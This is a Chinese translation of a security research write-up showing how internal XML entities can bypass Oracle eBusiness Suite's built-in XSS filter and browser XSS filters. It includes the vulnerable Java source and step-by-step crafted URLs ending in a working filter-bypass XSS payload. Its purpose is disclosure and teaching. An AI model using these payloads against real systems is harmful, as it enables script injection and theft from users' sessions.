使用 XML 内部实体绕过 Chrome 和 IE 的 XSS 过滤器

Seebug漏洞平台

发布于 2018-03-29 16:48:16

1.4K0

发布于 2018-03-29 16:48:16

文章被收录于专栏：Seebug漏洞平台

来源：BypassingXSSFiltersusingXMLInternalEntities

原作者：DavidLitchfield (david@davidlitchfield.com)

译：Holic (知道创宇404安全实验室)

tl;dr

若 Web 应用在后端处理了一些 XML 文件，而且存在 XSS 漏洞的话，那么或许能使用 XML 实体来绕过常用 web 浏览器的 XSS 过滤器，比如Chrome， IE 和 Safari 浏览器。同样在 Firefox 浏览器下依然有效，不过显然它没有 XSS 过滤器。

绕过常用浏览器的 XSS 过滤器

Oracle's eBusiness Suite 12.x 以及更早版本中的 BneApplicationService servlet 存在跨站脚本漏洞，这个最初与外部 XML 实体漏洞（XXE）同时被发现。

如果请求以下的URL：

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationS
ervice?bne:page=Bne MsgBox&bne:messagexml=XXX

将会得到如下响应：

The following error has occurred Exception Name: oracle.apps.bne.exception.BneFatalException -oracle.apps.bne.exception.BneFatalException: XML parse error in file at line 1, character 1.Log File Bookmark: 392699

那么我们可以修改请求把它包装在一个 XML 标签中。

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplication
Service?bne:page=Bne MsgBox&bne:messagexml=<FOO>XXXXX</FOO>

现在我们会得到以下响应：

he following error has occurred Exception Name: oracle.apps.bne.exception.BneFatalException - java.lang.ClassCastException:oracle.xml.parser.v2.XMLText cannot be cast to oracle.xml.parser.v2.XMLElementLog File Bookmark: 602808

因此我们需要弄清楚在后端的类中发生了什么。如果看源代码的话，我们将会发现在createBodyBneStyle方法中如下内容：

XMLDocument localXMLDocument = BneXMLDomUtils.parseString(this.m_messagesXML);

XMLElement localXMLElement1 =  
(XMLElement)localXMLDocument.getDocumentElement();
      NodeList localNodeList = localXMLElement1.getChildNodes();
      for (int i = 0; i < localNodeList.getLength(); i++)
      {
        String str1 = "";
        String str2 = "";
        String str3 = "";
        String str4 = null;
        String str5 = null;
        Node localNode = null;
        XMLElement localXMLElement2 = (XMLElement)localNodeList.item(i);
        NamedNodeMap localNamedNodeMap = localXMLElement2.getAttributes();
        localNode = localNamedNodeMap.getNamedItem("bne:type");
        if (localNode != null) {
          str1 = localNode.getNodeValue();
}
localNode = localNamedNodeMap.getNamedItem( b"ne:text "); if (localNode != null) {  
          str2 = localNode.getNodeValue();
        }
        localNode = localNamedNodeMap.getNamedItem("bne:value");
        if (localNode != null) {
          str3 = localNode.getNodeValue();
        }
localNode = localNamedNodeMap.getNamedItem( b"ne:cause "); if (localNode != null) {  
          str4 = localNode.getNodeValue();
        }
        localNode = localNamedNodeMap.getNamedItem("bne:action");
        if (localNode != null) {
          str5 = localNode.getNodeValue();
        }
        if ((!str1.equalsIgnoreCase("DATA")) && (str2 != ""))
        {
 localStringBuffer.append("<p><b>" + str2 + "</b></p>"); localStringBuffer.append("<p>" + str4 + "</p>");

我们可以看到，如果我们设置 bne:text的值不是词'data‘，那么它和 bne:cause的值将会返回给浏览器。这便允许我们创建一条不存在解析错误的查询字符串：

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplication
Service?bne:page=Bne MsgBox&bne:messagexml=<message><bne:a 
xmlns:bne="foo"%  
20bne:text="ABCDEF" bne:cause="GHIJKL"></bne:a ></message>

我们马上能看到这是很容易产生 XSS 的。我们简单地试一下；我们发送 <IMG SRC=/x onerror=alert(1)> 看看发生了什么：

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationS
ervice?bne:page=Bne MsgBox&bne:messagexml=<message><bne:a 
xmlns:bne="foo" bne:text="ABCDEF" bne:cause="<IMG SRC=/x 
onerror=alert(1)>"></bne:a></message>

Reserved program word <message><bne:a xmlns:bne="foo" bne:text="ABCDEF"bne:cause="<I ... detected. Press the Back button and remove the reserved program word. Contact your system administrator if thevalue cannot be changed

OK，所以 BneApplicationService 是有我们需要绕过的内置 XSS 过滤器的。回想一下我们最初找到的XXE处理漏洞。尝试使用外部 XML 实体（测试失败，因此并不受XXE攻击影响）之后，它启发我使用内部XML实体绕过 XSS 过滤器。这将会使得我们通过分解成占位符之后重建的方法对攻击进行伪装。但我们先看看什么是不被允许的。我们先去掉第一个左尖括号：

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplication
Service?bne:page=Bne MsgBox&bne:messagexml=<message><bne:a 
xmlns:bne="foo" bne:text="ABCDEF" bne:cause="IMG SRC=/x onerror= 
alert(1)>"></bne:a></message>

Ok, 看来可行。因此绕过 BneApplicationService 内置的过滤器，我们仅需要内部 XML 实体生成左尖括号即可，因此我们天津一个内部实体叫 xxx ，分配给它尖括号的值:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE DWL [<!ENTITY 
xxx"&lt;">]>

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationS
ervice?bne:page=Bne MsgBox&bne:messagexml= <?xml version="1.0" 
encoding=" UTF-8"?><!DOCTYPE DWL [<!ENTITY xxx " &lt;">]>% 3Cmessage>
<bne:a xmlns:bne="foo"  bne:text="ABCDEF" bne:cause="&xxx;IMG SRC=/x 
on error=alert(1)>"></bne:a></message>

我们的 alert(1)并没有执行，可想而知，因为 Chrome 的XSS过滤器发现了攻击行为：

那么我们必须绕过 Chrome 的 XSS 过滤器了。我们同样也可以使用内部XML实体来解决。我们创建 IMG, SRC和error中的one实体。这些实体会被 web 服务器的XML 解析器处理重组，但不会被 Chrome 当做反射型 XSS 攻击进行处理。

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationS
ervice?bne:page=Bne MsgBox&bne:messagexml=<?xml version="1.0" 
encoding="UT F-8"?><!DOCTYPE DWL [<!ENTITY xxx "&lt;% 22><! ENTITY 
yyy "IMG"><!ENTITY zzz "SRC "><!ENTITY ppp "one"%  3E]><message><bne: 
a xmlns:bne="foo" bne:text="ABCDEF" bne:caus e="&xxx;&yyy; &zzz;=/x 
&ppp;rror=alert(1)>"></bne:a ></message>

在以下浏览器测试成功：Firefox version 47, Chrome 51, IE 11, Safari 9.1.1

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2016-10-21，如有侵权请联系 cloudcommunity@tencent.com 删除

其他

本文分享自 Seebug漏洞平台微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

其他

登录后参与评论

0 条评论

热度